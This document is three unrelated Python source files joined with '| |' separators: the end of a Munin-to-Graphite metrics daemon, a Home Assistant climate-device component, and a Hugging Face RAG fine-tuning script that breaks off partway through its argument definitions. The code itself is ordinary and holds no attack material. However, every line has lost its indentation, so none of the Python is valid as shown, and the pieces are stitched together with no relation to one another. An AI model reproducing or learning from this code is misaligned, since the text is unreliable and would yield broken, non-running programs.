def handler_hup(signum, frame=None):
global threads
for t in threads:
t.reload()
def read_configuration(configfile):
"""
Returns False if configuration file is not readable, list of dictionaries otherwise
Configuration options follow parameters described as command line options. All parameters are optional except host,
displayname parameter is built from section name, so it is always presented too.
Non-existent options are superseded by defaults
Example:
[servername]
host=fqdn[:remotenode]
port=4949
carbon=carbonhostfqdn:port
interval=60
prefix=prefix for Graphite's target
noprefix=True|False
filter=^cpu.*
@param configfile: full filepath to configuration file
@rtype : object
"""
cf = ConfigParser.ConfigParser()
hostscfg = []
try:
cf.read(configfile)
for section in cf.sections():
di = {}
for ki, vi in cf.items(section):
# construct dictionary item
di[ki] = vi
if "host" in di.keys():
di["displayname"] = section
hostscfg.append(di)
except ConfigParser.Error as e:
logger.critical("Failed to parse configuration or command line options. Exception was %s. Giving up." % e)
return hostscfg
def main():
global threads
global logger
args = parse_args()
if args.verbose == 1:
logging_level = logging.ERROR
elif args.verbose == 3:
logging_level = logging.DEBUG
else:
logging_level = logging.INFO
#logging.basicConfig(format=LOGGING_FORMAT, level=logging_level)
logger = logging.getLogger()
logger.setLevel(logging_level)
syslog = logging.handlers.SysLogHandler(address='/dev/log')
stdout = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter('MUNIN-GRAPHITE: %(levelname)s %(message)s')
syslog.setFormatter(formatter)
if args.logtosyslog:
logger.addHandler(syslog)
else:
logger.addHandler(stdout)
# block for setting handling of signals
signal.signal(signal.SIGHUP, handler_hup)
signal.signal(signal.SIGTERM, handler_term)
signal.signal(signal.SIGINT, handler_term)
hosts = list()
if args.config:
hosts = read_configuration(args.config)
if not hosts:
# no file configuration, trying to use commandline arguments only and construct one-item dictionary
hosts.append({'host': args.host})
# we have got some items in hosts's list
for host in hosts:
logging.info("Going to thread with config %s" % host)
threads.append(MuninThread(host, args))
for t in threads:
t.start()
while True:
try:
if not any([t.isAlive() for t in threads]):
logging.info("All threads finished, exiting.")
break
else:
time.sleep(1)
except KeyboardInterrupt:
handler_term()
if __name__ == '__main__':
main()
| |
"""
Provides functionality to interact with climate devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/climate/
"""
import logging
import os
from numbers import Number
import voluptuous as vol
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.config import load_yaml_config_file
from homeassistant.util.temperature import convert as convert_temperature
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA # noqa
import homeassistant.helpers.config_validation as cv
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_TEMPERATURE, STATE_ON, STATE_OFF, STATE_UNKNOWN,
TEMP_CELSIUS)
DOMAIN = "climate"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
SCAN_INTERVAL = 60
SERVICE_SET_AWAY_MODE = "set_away_mode"
SERVICE_SET_AUX_HEAT = "set_aux_heat"
SERVICE_SET_TEMPERATURE = "set_temperature"
SERVICE_SET_FAN_MODE = "set_fan_mode"
SERVICE_SET_OPERATION_MODE = "set_operation_mode"
SERVICE_SET_SWING_MODE = "set_swing_mode"
SERVICE_SET_HUMIDITY = "set_humidity"
STATE_HEAT = "heat"
STATE_COOL = "cool"
STATE_IDLE = "idle"
STATE_AUTO = "auto"
STATE_DRY = "dry"
STATE_FAN_ONLY = "fan_only"
ATTR_CURRENT_TEMPERATURE = "current_temperature"
ATTR_MAX_TEMP = "max_temp"
ATTR_MIN_TEMP = "min_temp"
ATTR_TARGET_TEMP_HIGH = "target_temp_high"
ATTR_TARGET_TEMP_LOW = "target_temp_low"
ATTR_AWAY_MODE = "away_mode"
ATTR_AUX_HEAT = "aux_heat"
ATTR_FAN_MODE = "fan_mode"
ATTR_FAN_LIST = "fan_list"
ATTR_CURRENT_HUMIDITY = "current_humidity"
ATTR_HUMIDITY = "humidity"
ATTR_MAX_HUMIDITY = "max_humidity"
ATTR_MIN_HUMIDITY = "min_humidity"
ATTR_OPERATION_MODE = "operation_mode"
ATTR_OPERATION_LIST = "operation_list"
ATTR_SWING_MODE = "swing_mode"
ATTR_SWING_LIST = "swing_list"
CONVERTIBLE_ATTRIBUTE = [
ATTR_TEMPERATURE,
ATTR_TARGET_TEMP_LOW,
ATTR_TARGET_TEMP_HIGH,
]
_LOGGER = logging.getLogger(__name__)
SET_AWAY_MODE_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_AWAY_MODE): cv.boolean,
})
SET_AUX_HEAT_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_AUX_HEAT): cv.boolean,
})
SET_TEMPERATURE_SCHEMA = vol.Schema({
vol.Exclusive(ATTR_TEMPERATURE, 'temperature'): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_HIGH, 'temperature'): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_LOW, 'temperature'): vol.Coerce(float),
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Optional(ATTR_OPERATION_MODE): cv.string,
})
SET_FAN_MODE_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_FAN_MODE): cv.string,
})
SET_OPERATION_MODE_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_OPERATION_MODE): cv.string,
})
SET_HUMIDITY_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_HUMIDITY): vol.Coerce(float),
})
SET_SWING_MODE_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_SWING_MODE): cv.string,
})
def set_away_mode(hass, away_mode, entity_id=None):
"""Turn all or specified climate devices away mode on."""
data = {
ATTR_AWAY_MODE: away_mode
}
if entity_id:
data[ATTR_ENTITY_ID] = entity_id
hass.services.call(DOMAIN, SERVICE_SET_AWAY_MODE, data)
def set_aux_heat(hass, aux_heat, entity_id=None):
"""Turn all or specified climate devices auxillary heater on."""
data = {
ATTR_AUX_HEAT: aux_heat
}
if entity_id:
data[ATTR_ENTITY_ID] = entity_id
hass.services.call(DOMAIN, SERVICE_SET_AUX_HEAT, data)
# pylint: disable=too-many-arguments
def set_temperature(hass, temperature=None, entity_id=None,
target_temp_high=None, target_temp_low=None,
operation_mode=None):
"""Set new target temperature."""
kwargs = {
key: value for key, value in [
(ATTR_TEMPERATURE, temperature),
(ATTR_TARGET_TEMP_HIGH, target_temp_high),
(ATTR_TARGET_TEMP_LOW, target_temp_low),
(ATTR_ENTITY_ID, entity_id),
(ATTR_OPERATION_MODE, operation_mode)
] if value is not None
}
_LOGGER.debug("set_temperature start data=%s", kwargs)
hass.services.call(DOMAIN, SERVICE_SET_TEMPERATURE, kwargs)
def set_humidity(hass, humidity, entity_id=None):
"""Set new target humidity."""
data = {ATTR_HUMIDITY: humidity}
if entity_id is not None:
data[ATTR_ENTITY_ID] = entity_id
hass.services.call(DOMAIN, SERVICE_SET_HUMIDITY, data)
def set_fan_mode(hass, fan, entity_id=None):
"""Set all or specified climate devices fan mode on."""
data = {ATTR_FAN_MODE: fan}
if entity_id:
data[ATTR_ENTITY_ID] = entity_id
hass.services.call(DOMAIN, SERVICE_SET_FAN_MODE, data)
def set_operation_mode(hass, operation_mode, entity_id=None):
"""Set new target operation mode."""
data = {ATTR_OPERATION_MODE: operation_mode}
if entity_id is not None:
data[ATTR_ENTITY_ID] = entity_id
hass.services.call(DOMAIN, SERVICE_SET_OPERATION_MODE, data)
def set_swing_mode(hass, swing_mode, entity_id=None):
"""Set new target swing mode."""
data = {ATTR_SWING_MODE: swing_mode}
if entity_id is not None:
data[ATTR_ENTITY_ID] = entity_id
hass.services.call(DOMAIN, SERVICE_SET_SWING_MODE, data)
# pylint: disable=too-many-branches
def setup(hass, config):
"""Setup climate devices."""
component = EntityComponent(_LOGGER, DOMAIN, hass, SCAN_INTERVAL)
component.setup(config)
descriptions = load_yaml_config_file(
os.path.join(os.path.dirname(__file__), 'services.yaml'))
def away_mode_set_service(service):
"""Set away mode on target climate devices."""
target_climate = component.extract_from_service(service)
away_mode = service.data.get(ATTR_AWAY_MODE)
if away_mode is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_AWAY_MODE, ATTR_AWAY_MODE)
return
for climate in target_climate:
if away_mode:
climate.turn_away_mode_on()
else:
climate.turn_away_mode_off()
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_AWAY_MODE, away_mode_set_service,
descriptions.get(SERVICE_SET_AWAY_MODE),
schema=SET_AWAY_MODE_SCHEMA)
def aux_heat_set_service(service):
"""Set auxillary heater on target climate devices."""
target_climate = component.extract_from_service(service)
aux_heat = service.data.get(ATTR_AUX_HEAT)
if aux_heat is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_AUX_HEAT, ATTR_AUX_HEAT)
return
for climate in target_climate:
if aux_heat:
climate.turn_aux_heat_on()
else:
climate.turn_aux_heat_off()
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_AUX_HEAT, aux_heat_set_service,
descriptions.get(SERVICE_SET_AUX_HEAT),
schema=SET_AUX_HEAT_SCHEMA)
def temperature_set_service(service):
"""Set temperature on the target climate devices."""
target_climate = component.extract_from_service(service)
for climate in target_climate:
kwargs = {}
for value, temp in service.data.items():
if value in CONVERTIBLE_ATTRIBUTE:
kwargs[value] = convert_temperature(
temp,
hass.config.units.temperature_unit,
climate.temperature_unit
)
else:
kwargs[value] = temp
climate.set_temperature(**kwargs)
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_TEMPERATURE, temperature_set_service,
descriptions.get(SERVICE_SET_TEMPERATURE),
schema=SET_TEMPERATURE_SCHEMA)
def humidity_set_service(service):
"""Set humidity on the target climate devices."""
target_climate = component.extract_from_service(service)
humidity = service.data.get(ATTR_HUMIDITY)
if humidity is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_HUMIDITY, ATTR_HUMIDITY)
return
for climate in target_climate:
climate.set_humidity(humidity)
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_HUMIDITY, humidity_set_service,
descriptions.get(SERVICE_SET_HUMIDITY),
schema=SET_HUMIDITY_SCHEMA)
def fan_mode_set_service(service):
"""Set fan mode on target climate devices."""
target_climate = component.extract_from_service(service)
fan = service.data.get(ATTR_FAN_MODE)
if fan is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_FAN_MODE, ATTR_FAN_MODE)
return
for climate in target_climate:
climate.set_fan_mode(fan)
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_FAN_MODE, fan_mode_set_service,
descriptions.get(SERVICE_SET_FAN_MODE),
schema=SET_FAN_MODE_SCHEMA)
def operation_set_service(service):
"""Set operating mode on the target climate devices."""
target_climate = component.extract_from_service(service)
operation_mode = service.data.get(ATTR_OPERATION_MODE)
if operation_mode is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_OPERATION_MODE, ATTR_OPERATION_MODE)
return
for climate in target_climate:
climate.set_operation_mode(operation_mode)
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_OPERATION_MODE, operation_set_service,
descriptions.get(SERVICE_SET_OPERATION_MODE),
schema=SET_OPERATION_MODE_SCHEMA)
def swing_set_service(service):
"""Set swing mode on the target climate devices."""
target_climate = component.extract_from_service(service)
swing_mode = service.data.get(ATTR_SWING_MODE)
if swing_mode is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_SWING_MODE, ATTR_SWING_MODE)
return
for climate in target_climate:
climate.set_swing_mode(swing_mode)
if climate.should_poll:
climate.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_SWING_MODE, swing_set_service,
descriptions.get(SERVICE_SET_SWING_MODE),
schema=SET_SWING_MODE_SCHEMA)
return True
class ClimateDevice(Entity):
"""Representation of a climate device."""
# pylint: disable=too-many-public-methods,no-self-use
@property
def state(self):
"""Return the current state."""
if self.current_operation:
return self.current_operation
else:
return STATE_UNKNOWN
@property
def state_attributes(self):
"""Return the optional state attributes."""
data = {
ATTR_CURRENT_TEMPERATURE:
self._convert_for_display(self.current_temperature),
ATTR_MIN_TEMP: self._convert_for_display(self.min_temp),
ATTR_MAX_TEMP: self._convert_for_display(self.max_temp),
ATTR_TEMPERATURE:
self._convert_for_display(self.target_temperature),
}
target_temp_high = self.target_temperature_high
if target_temp_high is not None:
data[ATTR_TARGET_TEMP_HIGH] = self._convert_for_display(
self.target_temperature_high)
data[ATTR_TARGET_TEMP_LOW] = self._convert_for_display(
self.target_temperature_low)
humidity = self.target_humidity
if humidity is not None:
data[ATTR_HUMIDITY] = humidity
data[ATTR_CURRENT_HUMIDITY] = self.current_humidity
data[ATTR_MIN_HUMIDITY] = self.min_humidity
data[ATTR_MAX_HUMIDITY] = self.max_humidity
fan_mode = self.current_fan_mode
if fan_mode is not None:
data[ATTR_FAN_MODE] = fan_mode
if self.fan_list:
data[ATTR_FAN_LIST] = self.fan_list
operation_mode = self.current_operation
if operation_mode is not None:
data[ATTR_OPERATION_MODE] = operation_mode
if self.operation_list:
data[ATTR_OPERATION_LIST] = self.operation_list
swing_mode = self.current_swing_mode
if swing_mode is not None:
data[ATTR_SWING_MODE] = swing_mode
if self.swing_list:
data[ATTR_SWING_LIST] = self.swing_list
is_away = self.is_away_mode_on
if is_away is not None:
data[ATTR_AWAY_MODE] = STATE_ON if is_away else STATE_OFF
is_aux_heat = self.is_aux_heat_on
if is_aux_heat is not None:
data[ATTR_AUX_HEAT] = STATE_ON if is_aux_heat else STATE_OFF
return data
@property
def unit_of_measurement(self):
"""The unit of measurement to display."""
return self.hass.config.units.temperature_unit
@property
def temperature_unit(self):
"""The unit of measurement used by the platform."""
raise NotImplementedError
@property
def current_humidity(self):
"""Return the current humidity."""
return None
@property
def target_humidity(self):
"""Return the humidity we try to reach."""
return None
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
return None
@property
def operation_list(self):
"""List of available operation modes."""
return None
@property
def current_temperature(self):
"""Return the current temperature."""
return None
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return None
@property
def target_temperature_high(self):
"""Return the highbound target temperature we try to reach."""
return None
@property
def target_temperature_low(self):
"""Return the lowbound target temperature we try to reach."""
return None
@property
def is_away_mode_on(self):
"""Return true if away mode is on."""
return None
@property
def is_aux_heat_on(self):
"""Return true if aux heater."""
return None
@property
def current_fan_mode(self):
"""Return the fan setting."""
return None
@property
def fan_list(self):
"""List of available fan modes."""
return None
@property
def current_swing_mode(self):
"""Return the fan setting."""
return None
@property
def swing_list(self):
"""List of available swing modes."""
return None
def set_temperature(self, **kwargs):
"""Set new target temperature."""
raise NotImplementedError()
def set_humidity(self, humidity):
"""Set new target humidity."""
raise NotImplementedError()
def set_fan_mode(self, fan):
"""Set new target fan mode."""
raise NotImplementedError()
def set_operation_mode(self, operation_mode):
"""Set new target operation mode."""
raise NotImplementedError()
def set_swing_mode(self, swing_mode):
"""Set new target swing operation."""
raise NotImplementedError()
def turn_away_mode_on(self):
"""Turn away mode on."""
raise NotImplementedError()
def turn_away_mode_off(self):
"""Turn away mode off."""
raise NotImplementedError()
def turn_aux_heat_on(self):
"""Turn auxillary heater on."""
raise NotImplementedError()
def turn_aux_heat_off(self):
"""Turn auxillary heater off."""
raise NotImplementedError()
@property
def min_temp(self):
"""Return the minimum temperature."""
return convert_temperature(7, TEMP_CELSIUS, self.temperature_unit)
@property
def max_temp(self):
"""Return the maximum temperature."""
return convert_temperature(35, TEMP_CELSIUS, self.temperature_unit)
@property
def min_humidity(self):
"""Return the minimum humidity."""
return 30
@property
def max_humidity(self):
"""Return the maximum humidity."""
return 99
def _convert_for_display(self, temp):
"""Convert temperature into preferred units for display purposes."""
if temp is None or not isinstance(temp, Number):
return temp
value = convert_temperature(temp, self.temperature_unit,
self.unit_of_measurement)
if self.unit_of_measurement is TEMP_CELSIUS:
decimal_count = 1
else:
# Users of fahrenheit generally expect integer units.
decimal_count = 0
return round(value, decimal_count)
| |
"""Finetuning script for RAG models. Adapted from examples.seq2seq.finetune.py"""
import argparse
import logging
import os
import sys
import time
from collections import defaultdict
from pathlib import Path
from typing import Any, Dict, List, Tuple
import numpy as np
import pytorch_lightning as pl
import torch
import torch.distributed as dist
from pytorch_lightning.accelerators.ddp_accelerator import DDPAccelerator
from pytorch_lightning.cluster_environments import TorchElasticEnvironment
from torch.utils.data import DataLoader
from transformers import (
AutoConfig,
AutoTokenizer,
BartForConditionalGeneration,
BatchEncoding,
RagConfig,
RagSequenceForGeneration,
RagTokenForGeneration,
RagTokenizer,
T5ForConditionalGeneration,
)
from transformers import logging as transformers_logging
from transformers.integrations import is_ray_available
if is_ray_available():
import ray
from distributed_ray_retriever import RagRayDistributedRetriever, RayRetriever
from callbacks_rag import ( # noqa: E402 # isort:skipq
get_checkpoint_callback,
get_early_stopping_callback,
Seq2SeqLoggingCallback,
)
from distributed_pytorch_retriever import RagPyTorchDistributedRetriever # noqa: E402 # isort:skip
from utils_rag import ( # noqa: E402 # isort:skip
calculate_exact_match,
flatten_list,
get_git_info,
is_rag_model,
lmap,
pickle_save,
save_git_info,
save_json,
set_extra_model_params,
Seq2SeqDataset,
)
# need the parent dir module
sys.path.insert(2, str(Path(__file__).resolve().parents[1]))
from lightning_base import BaseTransformer, add_generic_args, generic_train # noqa
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
transformers_logging.set_verbosity_info()
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
# In PTL >v1.0, `init_ddp_connection` method in the `LightningModule`
# is no longer used, and is moved into DDPAccelerator instead.
# We override DDPAccelerator to add our custom logic for initializing the
# retriever.
# https://github.com/PyTorchLightning/pytorch-lightning/blob/master/tests/backends/test_accelerator_connector.py
class CustomAccel(DDPAccelerator):
def __init__(self, trainer=None, **kwargs):
# Trainer is set later.
super().__init__(trainer, **kwargs)
def init_ddp_connection(self, global_rank: int, world_size: int, is_slurm_managing_tasks: bool = True):
logger.info("Custom init_ddp_connection.")
module = self.trainer.model
if self.cluster_environment is None:
self.cluster_environment = TorchElasticEnvironment()
self.distributed_port = module.hparams.distributed_port
os.environ["MASTER_PORT"] = str(self.distributed_port)
super().init_ddp_connection(global_rank, world_size, is_slurm_managing_tasks)
if module.is_rag_model:
if module.distributed_retriever == "pytorch":
module.model.rag.retriever.init_retrieval(self.distributed_port)
elif module.distributed_retriever == "ray" and global_rank == 0:
# For the Ray retriever, only initialize it once when global
# rank is 0.
module.model.rag.retriever.init_retrieval()
class GenerativeQAModule(BaseTransformer):
mode = "generative_qa"
loss_names = ["loss"]
metric_names = ["em"]
val_metric = "em"
def __init__(self, hparams, **kwargs):
# when loading from a pytorch lightning checkpoint, hparams are passed as dict
if isinstance(hparams, dict):
hparams = AttrDict(hparams)
if hparams.model_type == "rag_sequence":
self.model_class = RagSequenceForGeneration
elif hparams.model_type == "rag_token":
self.model_class = RagTokenForGeneration
elif hparams.model_type == "bart":
self.model_class = BartForConditionalGeneration
else:
self.model_class = T5ForConditionalGeneration
self.is_rag_model = is_rag_model(hparams.model_type)
config_class = RagConfig if self.is_rag_model else AutoConfig
config = config_class.from_pretrained(hparams.model_name_or_path)
# set retriever parameters
config.index_name = hparams.index_name or config.index_name
config.passages_path = hparams.passages_path or config.passages_path
config.index_path = hparams.index_path or config.index_path
config.use_dummy_dataset = hparams.use_dummy_dataset
# set extra_model_params for generator configs and load_model
extra_model_params = ("encoder_layerdrop", "decoder_layerdrop", "attention_dropout", "dropout")
if self.is_rag_model:
if hparams.prefix is not None:
config.generator.prefix = hparams.prefix
config.label_smoothing = hparams.label_smoothing
hparams, config.generator = set_extra_model_params(extra_model_params, hparams, config.generator)
if hparams.distributed_retriever == "pytorch":
retriever = RagPyTorchDistributedRetriever.from_pretrained(hparams.model_name_or_path, config=config)
elif hparams.distributed_retriever == "ray":
# The Ray retriever needs the handles to the retriever actors.
retriever = RagRayDistributedRetriever.from_pretrained(
hparams.model_name_or_path, hparams.actor_handles, config=config
)
model = self.model_class.from_pretrained(hparams.model_name_or_path, config=config, retriever=retriever)
prefix = config.question_encoder.prefix
else:
if hparams.prefix is not None:
config.prefix = hparams.prefix
hparams, config = set_extra_model_params(extra_model_params, hparams, config)
model = self.model_class.from_pretrained(hparams.model_name_or_path, config=config)
prefix = config.prefix
tokenizer = (
RagTokenizer.from_pretrained(hparams.model_name_or_path)
if self.is_rag_model
else AutoTokenizer.from_pretrained(hparams.model_name_or_path)
)
super().__init__(hparams, config=config, tokenizer=tokenizer, model=model)
save_git_info(self.hparams.output_dir)
self.output_dir = Path(self.hparams.output_dir)
self.metrics_save_path = Path(self.output_dir) / "metrics.json"
self.hparams_save_path = Path(self.output_dir) / "hparams.pkl"
pickle_save(self.hparams, self.hparams_save_path)
self.step_count = 0
self.metrics = defaultdict(list)
self.dataset_kwargs: dict = dict(
data_dir=self.hparams.data_dir,
max_source_length=self.hparams.max_source_length,
prefix=prefix or "",
)
n_observations_per_split = {
"train": self.hparams.n_train,
"val": self.hparams.n_val,
"test": self.hparams.n_test,
}
self.n_obs = {k: v if v >= 0 else None for k, v in n_observations_per_split.items()}
self.target_lens = {
"train": self.hparams.max_target_length,
"val": self.hparams.val_max_target_length,
"test": self.hparams.test_max_target_length,
}
assert self.target_lens["train"] <= self.target_lens["val"], f"target_lens: {self.target_lens}"
assert self.target_lens["train"] <= self.target_lens["test"], f"target_lens: {self.target_lens}"
self.hparams.git_sha = get_git_info()["repo_sha"]
self.num_workers = hparams.num_workers
self.distributed_port = self.hparams.distributed_port
# For single GPU training, init_ddp_connection is not called.
# So we need to initialize the retrievers here.
if hparams.gpus <= 1:
if hparams.distributed_retriever == "ray":
self.model.retriever.init_retrieval()
elif hparams.distributed_retriever == "pytorch":
self.model.retriever.init_retrieval(self.distributed_port)
self.distributed_retriever = hparams.distributed_retriever
def forward(self, input_ids, **kwargs):
return self.model(input_ids, **kwargs)
def ids_to_clean_text(self, generated_ids: List[int]):
gen_text = self.tokenizer.batch_decode(
generated_ids, skip_special_tokens=True, clean_up_tokenization_spaces=True
)
return lmap(str.strip, gen_text)
def _step(self, batch: dict) -> Tuple:
source_ids, source_mask, target_ids = batch["input_ids"], batch["attention_mask"], batch["decoder_input_ids"]
rag_kwargs = {}
if isinstance(self.model, T5ForConditionalGeneration):
decoder_input_ids = self.model._shift_right(target_ids)
lm_labels = target_ids
elif isinstance(self.model, BartForConditionalGeneration):
decoder_input_ids = target_ids[:, :-1].contiguous()
lm_labels = target_ids[:, 1:].clone()
else:
assert self.is_rag_model
generator = self.model.rag.generator
if isinstance(generator, T5ForConditionalGeneration):
decoder_start_token_id = generator.config.decoder_start_token_id
decoder_input_ids = (
torch.cat(
[torch.Tensor([[decoder_start_token_id]] * target_ids.shape[0]).to(target_ids), target_ids],
dim=1,
)
if target_ids.shape[0] < self.target_lens["train"]
else generator._shift_right(target_ids)
)
elif isinstance(generator, BartForConditionalGeneration):
decoder_input_ids = target_ids
lm_labels = decoder_input_ids
rag_kwargs["reduce_loss"] = True
assert decoder_input_ids is not None
outputs = self(
source_ids,
attention_mask=source_mask,
decoder_input_ids=decoder_input_ids,
use_cache=False,
labels=lm_labels,
**rag_kwargs,
)
loss = outputs["loss"]
return (loss,)
@property
def pad(self) -> int:
raise NotImplementedError("pad not implemented")
def training_step(self, batch, batch_idx) -> Dict:
loss_tensors = self._step(batch)
logs = {name: loss for name, loss in zip(self.loss_names, loss_tensors)}
# tokens per batch
tgt_pad_token_id = (
self.tokenizer.generator.pad_token_id
if isinstance(self.tokenizer, RagTokenizer)
else self.tokenizer.pad_token_id
)
src_pad_token_id = (
self.tokenizer.question_encoder.pad_token_id
if isinstance(self.tokenizer, RagTokenizer)
else self.tokenizer.pad_token_id
)
logs["tpb"] = (
batch["input_ids"].ne(src_pad_token_id).sum() + batch["decoder_input_ids"].ne(tgt_pad_token_id).sum()
)
return {"loss": loss_tensors[0], "log": logs}
def validation_step(self, batch, batch_idx) -> Dict:
return self._generative_step(batch)
def validation_epoch_end(self, outputs, prefix="val") -> Dict:
self.step_count += 1
losses = {k: torch.stack([x[k] for x in outputs]).mean() for k in self.loss_names}
loss = losses["loss"]
gen_metrics = {
k: np.array([x[k] for x in outputs]).mean() for k in self.metric_names + ["gen_time", "gen_len"]
}
metrics_tensor: torch.FloatTensor = torch.tensor(gen_metrics[self.val_metric]).type_as(loss)
gen_metrics.update({k: v.item() for k, v in losses.items()})
# fix for https://github.com/PyTorchLightning/pytorch-lightning/issues/2424
if dist.is_initialized():
dist.all_reduce(metrics_tensor, op=dist.ReduceOp.SUM)
metrics_tensor = metrics_tensor / dist.get_world_size()
gen_metrics.update({self.val_metric: metrics_tensor.item()})
losses.update(gen_metrics)
metrics = {f"{prefix}_avg_{k}": x for k, x in losses.items()}
metrics["step_count"] = self.step_count
self.save_metrics(metrics, prefix) # writes to self.metrics_save_path
preds = flatten_list([x["preds"] for x in outputs])
return {"log": metrics, "preds": preds, f"{prefix}_loss": loss, f"{prefix}_{self.val_metric}": metrics_tensor}
def save_metrics(self, latest_metrics, type_path) -> None:
self.metrics[type_path].append(latest_metrics)
save_json(self.metrics, self.metrics_save_path)
def calc_generative_metrics(self, preds, target) -> Dict:
return calculate_exact_match(preds, target)
def _generative_step(self, batch: dict) -> dict:
start_time = time.time()
batch = BatchEncoding(batch).to(device=self.model.device)
generated_ids = self.model.generate(
batch["input_ids"],
attention_mask=batch["attention_mask"],
do_deduplication=False, # rag specific parameter
use_cache=True,
min_length=1,
max_length=self.target_lens["val"],
)
gen_time = (time.time() - start_time) / batch["input_ids"].shape[0]
preds: List[str] = self.ids_to_clean_text(generated_ids)
target: List[str] = self.ids_to_clean_text(batch["decoder_input_ids"])
loss_tensors = self._step(batch)
base_metrics = {name: loss for name, loss in zip(self.loss_names, loss_tensors)}
gen_metrics: Dict = self.calc_generative_metrics(preds, target)
summ_len = np.mean(lmap(len, generated_ids))
base_metrics.update(gen_time=gen_time, gen_len=summ_len, preds=preds, target=target, **gen_metrics)
return base_metrics
def test_step(self, batch, batch_idx):
return self._generative_step(batch)
def test_epoch_end(self, outputs):
return self.validation_epoch_end(outputs, prefix="test")
def get_dataset(self, type_path) -> Seq2SeqDataset:
n_obs = self.n_obs[type_path]
max_target_length = self.target_lens[type_path]
dataset = Seq2SeqDataset(
self.tokenizer,
type_path=type_path,
n_obs=n_obs,
max_target_length=max_target_length,
**self.dataset_kwargs,
)
return dataset
def get_dataloader(self, type_path: str, batch_size: int, shuffle: bool = False) -> DataLoader:
dataset = self.get_dataset(type_path)
dataloader = DataLoader(
dataset,
batch_size=batch_size,
collate_fn=dataset.collate_fn,
shuffle=shuffle,
num_workers=self.num_workers,
)
return dataloader
def train_dataloader(self) -> DataLoader:
dataloader = self.get_dataloader("train", batch_size=self.hparams.train_batch_size, shuffle=True)
return dataloader
def val_dataloader(self) -> DataLoader:
return self.get_dataloader("val", batch_size=self.hparams.eval_batch_size)
def test_dataloader(self) -> DataLoader:
return self.get_dataloader("test", batch_size=self.hparams.eval_batch_size)
@pl.utilities.rank_zero_only
def on_save_checkpoint(self, checkpoint: Dict[str, Any]) -> None:
save_path = self.output_dir.joinpath("checkpoint{}".format(self.step_count))
self.model.config.save_step = self.step_count
self.model.save_pretrained(save_path)
self.tokenizer.save_pretrained(save_path)
@staticmethod
def add_model_specific_args(parser, root_dir):
BaseTransformer.add_model_specific_args(parser, root_dir)
add_generic_args(parser, root_dir)
parser.add_argument(
"--max_source_length",
default=128,
type=int,
help="The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded.",
)
parser.add_argument(
"--max_target_length",
default=25,
type=int,
help="The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded.",
)
parser.add_argument(
"--val_max_target_length",
default=25,
type=int,
help="The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded.",
)
parser.add_argument(
"--test_max_target_length",
default=25,
type=int,
help="The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded.",
)
parser.add_argument("--logger_name", type=str, choices=["default", "wandb", "wandb_shared"], default="default")
parser.add_argument("--n_train", type=int, default=-1, required=False, help="# examples. -1 means use all.")
parser.add_argument("--n_val", type=int, default=-1, required=False, help="# examples. -1 means use all.")
parser.add_argument("--n_test", type=int, default=-1, required=False, help="# examples. -1 means use all.")
parser.add_argument("--label_smoothing", type=float, default=0.0, required=False)
parser.add_argument(
"--prefix",
type=str,
default=None,
help="Prefix added at the beginning of each text, typically used with T5-based models.",
)
parser.add_argument(
"--early_stopping_patience",
type=int,
default=-1,
required=False,
help="-1 means never early stop. early_stopping_patience is measured in validation checks, not epochs. So val_check_interval will effect it.",
)
parser.add_argument(
"--distributed-port", type=int, default=-1, required=False, help="Port number for distributed training."
)
parser.add_argument(
"--model_type",
choices=["rag_sequence", "rag_token", "bart", "t5"],
type=str,
help="RAG model type: sequence or token, if none specified, the type is inferred from the model_name_or_path",
)
return parser
@staticmethod
def add_retriever_specific_args(parser):
parser.add_argument(
"--index_name",
type=str,
default=None,
help="Name of the index to use: 'hf' for a canonical dataset from the datasets library (default), 'custom' for a local index, or 'legacy' for the orignal one)",
)
parser.add_argument(
"--passages_path",
type=str,
default=None,
